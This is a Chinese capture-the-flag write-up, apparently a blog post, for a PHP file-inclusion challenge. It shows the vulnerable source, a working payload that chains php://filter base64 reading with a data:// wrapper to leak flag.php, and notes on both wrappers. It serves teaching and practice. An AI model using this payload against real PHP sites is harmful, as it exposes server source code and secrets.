91,【7】 攻防世界 web fileclude

进入靶场

php 复制代码
<?php
// 包含 flag.php 文件
include("flag.php");

// 以高亮语法显示当前文件(即包含这段代码的 PHP 文件)的内容
// 方便查看当前代码结构和逻辑,常用于调试或给解题者提示代码信息
highlight_file(__FILE__);

// 检查是否通过 GET 请求传递了名为 file1 和 file2 的两个参数
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
    // 如果传递了这两个参数,将它们的值分别赋给变量 $file1 和 $file2
    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];

    // 检查 $file1 和 $file2 这两个变量的值是否不为空
    if(!empty($file1) && !empty($file2))
    {
        // 使用 file_get_contents 函数读取 $file2 指定文件的全部内容
        // 并检查读取的内容是否严格等于字符串 "hello ctf"
        if(file_get_contents($file2) === "hello ctf")
        {
            // 如果 $file2 文件的内容是 "hello ctf",则包含 $file1 指定的文件
            // 这可能会执行 $file1 文件中的代码,是利用漏洞获取 flag 的关键步骤
            include($file1);
        }
    }
    else
        // 如果 $file1 或 $file2 为空,输出 "NONONO" 并终止脚本执行
        die("NONONO");
}
?>

需要用伪协议模拟文件

容易构造

php 复制代码
?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctf

php 复制代码
PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXsyMTJmMWNiZDNiYTc2OGYyZWRlMjZkZmY2YTM4ZGZmMH0=

CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码

笔记

1,data:// 伪协议的使用

data:// 是 PHP 中的伪协议,它允许将一段数据当作一个虚拟文件来处理。其基本格式如下:

复制代码
data://<mime-type>[;charset=<charset>][;base64],<data>
  • <mime-type>:指定数据的 MIME 类型,text/plain 表示纯文本类型。
  • charset:可选参数,用于指定字符编码。
  • base64:可选参数,若数据经过 Base64 编码则需指定。
  • <data>:实际的数据内容,也就是要作为虚拟文件执行的代码。
2,php://伪协议的使用
php 复制代码
php://filter/<过滤类型>/resource=<文件路径>
相关推荐
李白的天不白13 小时前
Tree-Shaking
前端
故渊at13 小时前
第十三板块:Android 综合架构与未来演进 | 第三十一篇:Android 架构演进与 Fuchsia OS 的挑战
android·架构·宏内核·微内核·fuchsia·ipc 性能博弈
aqi0013 小时前
一文速览 HarmonyOS 6.1.1 推出的十个新特性
android·华为·harmonyos·鸿蒙·harmony
Csvn13 小时前
TypeScript:你以为安全的 `JSON.parse` 其实是颗雷 — 运行时类型安全实战
前端·javascript
橘子星14 小时前
深入理解线性数据结构:栈、队列与链表
前端·javascript
dadaobusi14 小时前
Linux内核完成大量内存/调度/时间子系统初始化的关键阶段
java·linux·前端
用户0595401744614 小时前
Redis 缓存过期不一致踩坑实录:一个 bug 让我排查了 3 小时,最终用 Pytest 自动化堵上漏洞
前端·css
东风破_14 小时前
AJAX 异步请求:从回调地狱到 async/await,到底解决了什么?
前端
Larcher14 小时前
JS 数据类型的八重人格与内存真相
前端·javascript
matrixmind114 小时前
aiomysql:异步场景下的 MySQL 驱动
android·数据库·mysql·其他